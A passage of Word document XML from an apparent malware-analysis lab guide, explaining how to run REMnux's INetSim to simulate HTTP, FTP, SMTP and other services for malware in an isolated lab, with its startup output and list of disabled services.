    </w:p>
    <w:p w14:paraId="242FBF47" w14:textId="77777777" w:rsidR="008C05FF" w:rsidRPr="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C05FF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Reply from 123.123.123.123: bytes=32 time&lt;1ms TTL=64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C9D04C" w14:textId="77777777" w:rsidR="008C05FF" w:rsidRPr="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C05FF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Reply from 123.123.123.123: bytes=32 time&lt;1ms TTL=64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1748D4B8" w14:textId="77777777" w:rsidR="008C05FF" w:rsidRPr="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C05FF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Reply from 123.123.123.123: bytes=32 time&lt;1ms TTL=64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601559E7" w14:textId="77777777" w:rsidR="008C05FF" w:rsidRPr="008C05FF" w:rsidRDefault="008C05FF" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C05FF">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Reply from 123.123.123.123: bytes=32 time&lt;1ms TTL=64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5254D4" w14:textId="7A4FBFE9" w:rsidR="008C05FF" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="HeadingStyle1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="540"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc24514474"/>
      <w:r>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidR="008C05FF">
        <w:t xml:space="preserve"> Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="1489F261" w14:textId="1C79E375" w:rsidR="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Malware use</w:t>
      </w:r>
      <w:r w:rsidR="00A63D66">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> popular protocols for command and control purposes, such as HTTP or FTP.</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Certain code paths </w:t>
      </w:r>
      <w:r w:rsidR="00A63D66">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">executed by the malware </w:t>
      </w:r>
      <w:r w:rsidR="00A63D66">
        <w:t xml:space="preserve">only </w:t>
      </w:r>
      <w:r>
        <w:t>if they are able to reach servers that respond to these protocol requests and provide expected answers. For this reason, we have to host services to respond to the</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t xml:space="preserve">se protocol requests in </w:t>
      </w:r>
      <w:r w:rsidR="008643DD">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t>lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BEE43D" w14:textId="030690A7" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t>EM</w:t>
      </w:r>
      <w:r>
        <w:t>nux comes with another suite of tools for exactly this purpose c</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t>alled “IN</w:t>
      </w:r>
      <w:r>
        <w:t>et</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>im</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t>et</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>im simulate</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> common services that </w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t>malware interacts with</w:t>
      </w:r>
      <w:r>
        <w:t>. Upon execution</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it simulate</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the following by default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DF1395" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>INetSim 1.2.5 (2014-05-24) by Matthias Eckert &amp; Thomas Hungenberg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFF01EF" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Using log directory:      /var/log/inetsim/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFA209D" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Using data directory:     /var/lib/inetsim/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C20B5E" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Using report directory:   /var/log/inetsim/report/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673AD104" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Using configuration file: /etc/inetsim/inetsim.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56716550" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Parsing configuration file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57488641" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Configuration file parsed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14533D70" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>=== INetSim main process started (PID 1845) ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5868B2A6" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Session ID:     1845</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439A76A7" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Listening on:   192.168.118.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C6B12C" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Real Date/Time: 2016-12-20 17:46:42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C87A9EB" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fake Date/Time: 2016-12-20 17:46:42 (Delta: 0 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8E7A68" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Forking services...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FAC00B" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  * https_443_tcp - started (PID 1848)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A66527" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  * http_80_tcp - started (PID 1847)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B834602" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  * smtp_25_tcp - started (PID 1849)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7621A772" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  * smtps_465_tcp - started (PID 1850)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0421AFD6" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  * pop3s_995_tcp - started (PID 1852)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B635C1E" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  * pop3_110_tcp - started (PID 1851)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD1A74A" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  * ftp_21_tcp - started (PID 1853)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0BAB27" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  * ftps_990_tcp - started (PID 1854)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B0081D" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D"/>
    <w:p w14:paraId="5173F42B" w14:textId="77777777" w:rsidR="00581DF1" w:rsidRDefault="00581DF1" w:rsidP="002E6E3D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D34100A" w14:textId="57DFFC1C" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Although a</w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t xml:space="preserve"> number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of other services are available, </w:t>
      </w:r>
      <w:r w:rsidR="00581DF1">
        <w:t>they</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are disabled by default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2157F865" w14:textId="26366D65" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ grep "#start_service" /etc/inetsim/inetsim.conf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E10D56" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service dns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C9837E" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service tftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C65E27" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service irc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2016CECB" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service ntp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2608064F" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service finger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE6BFE5" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service ident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5C7AB3" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DBFBF3" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service time_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635D415D" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service time_udp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA16D72" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service daytime_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF06E07" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service daytime_udp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B9E48E" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service echo_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A81BF2D" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service echo_udp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9005E8" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service discard_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463F3F9E" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service discard_udp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03785BEE" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service quotd_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6B7089" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service quotd_udp</w:t>
      </w:r>
